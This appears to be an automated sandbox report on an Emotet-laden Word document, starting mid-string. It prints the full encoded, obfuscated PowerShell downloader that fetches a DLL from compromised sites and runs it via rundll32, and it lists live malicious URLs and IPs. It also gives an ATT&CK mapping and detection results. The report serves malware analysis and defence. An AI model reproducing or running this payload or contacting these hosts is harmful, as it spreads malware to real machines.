AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 336496 Sample: pack 2254794.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 50 Multi AV Scanner detection for domain / URL 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 12 other signatures 2->56 12 cmd.exe 2->12         started        15 WINWORD.EXE 293 21 2->15         started        process3 signatures4 66 Suspicious powershell command line found 12->66 68 Very long command line found 12->68 70 Encrypted powershell cmdline option found 12->70 72 PowerShell case anomaly found 12->72 17 powershell.exe 12 9 12->17         started        22 msg.exe 12->22         started        process5 dnsIp6 44 petafilm.com 176.53.69.151, 49167, 80 RADORETR Turkey 17->44 42 C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32 17->42 dropped 58 Powershell drops PE file 17->58 24 rundll32.exe 17->24         started        file7 signatures8 process9 process10 26 rundll32.exe 15 24->26         started        signatures11 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->64 29 rundll32.exe 5 26->29         started        process12 signatures13 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->74 32 rundll32.exe 5 29->32         started        process14 signatures15 48 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->48 35 rundll32.exe 5 32->35         started        process16 signatures17 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->60 38 rundll32.exe 13 35->38         started        process18 dnsIp19 46 5.2.136.90, 49168, 80 RCS-RDS73-75DrStaicoviciRO Romania 38->46 62 System process connects to network (likely due to code injection or exploit) 38->62 signatures20

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    pack 2254794.doc30%VirustotalBrowse
                    pack 2254794.doc33%ReversingLabsDocument-Excel.Trojan.Heuristic

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    8.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    11.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    9.2.rundll32.exe.190000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    10.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    7.2.rundll32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    petafilm.com6%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://petafilm.com6%VirustotalBrowse
                    http://petafilm.com0%Avira URL Cloudsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://zieflix.teleskopstore.com/cgi-bin/Gt3S/5%VirustotalBrowse
                    http://zieflix.teleskopstore.com/cgi-bin/Gt3S/0%Avira URL Cloudsafe
                    http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/0%Avira URL Cloudsafe
                    https://somanap.com/wp-admin/P/0%Avira URL Cloudsafe
                    https://fnjbq.com/wp-includes/rlR/100%Avira URL Cloudmalware
                    http://wap.zhonglisc.com/wp-includes/QryCB/100%Avira URL Cloudmalware
                    http://petafilm.com/wp-admin/4m/100%Avira URL Cloudmalware
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/100%Avira URL Cloudmalware
                    http://givingthanksdaily.com/qlE/VeF/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    petafilm.com
                    176.53.69.151
                    truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/true
                    • Avira URL Cloud: safe
                    unknown
                    http://petafilm.com/wp-admin/4m/true
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmpfalse
                      high
                      http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpfalse
                        high
                        http://investor.msn.comrundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpfalse
                            high
                            http://petafilm.compowershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmptrue
                            • 6%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmpfalse
                              high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmpfalse
                                high
                                http://zieflix.teleskopstore.com/cgi-bin/Gt3S/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                • 5%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://somanap.com/wp-admin/P/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpfalse
                                  high
                                  https://fnjbq.com/wp-includes/rlR/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://wap.zhonglisc.com/wp-includes/QryCB/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.%s.comPApowershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://www.piriform.com/cclea;powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmpfalse
                                    high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpfalse
                                      high
                                      https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://givingthanksdaily.com/qlE/VeF/powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      176.53.69.151
                                      unknownTurkey
                                      42926RADORETRtrue
                                      5.2.136.90
                                      unknownRomania
                                      8708RCS-RDS73-75DrStaicoviciROtrue

                                      General Information

                                      Joe Sandbox Version:31.0.0 Red Diamond
                                      Analysis ID:336496
                                      Start date:06.01.2021
                                      Start time:08:48:16
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 55s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:pack 2254794.doc
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • GSI enabled (VBA)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winDOC@18/8@1/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 88% (good quality ratio 84.5%)
                                      • Quality average: 76.7%
                                      • Quality standard deviation: 26.2%
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .doc
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Found warning dialog
                                      • Click Ok
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                      • TCP Packets have been reduced to 100
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      08:48:40API Interceptor1x Sleep call for process: msg.exe modified
                                      08:48:41API Interceptor31x Sleep call for process: powershell.exe modified
                                      08:48:46API Interceptor946x Sleep call for process: rundll32.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      176.53.69.151informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      ytgeKMQNL2.docGet hashmaliciousBrowse
                                      • petafilm.com/wp-admin/4m/
                                      5.2.136.90DATA-480841.docGet hashmaliciousBrowse
                                      • 5.2.136.90/6tycsc/
                                      Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                      • 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
                                      pack-91089 416755919.docGet hashmaliciousBrowse
                                      • 5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
                                      Adjunto.docGet hashmaliciousBrowse
                                      • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                      arc-NZY886292.docGet hashmaliciousBrowse
                                      • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                      NQN0244_012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                      4560 2021 UE_9893.docGet hashmaliciousBrowse
                                      • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                      Scan-0767672.docGet hashmaliciousBrowse
                                      • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                      Documento-2021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                      informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/kcdo20u2bqptv6/
                                      rapport 40329241.docGet hashmaliciousBrowse
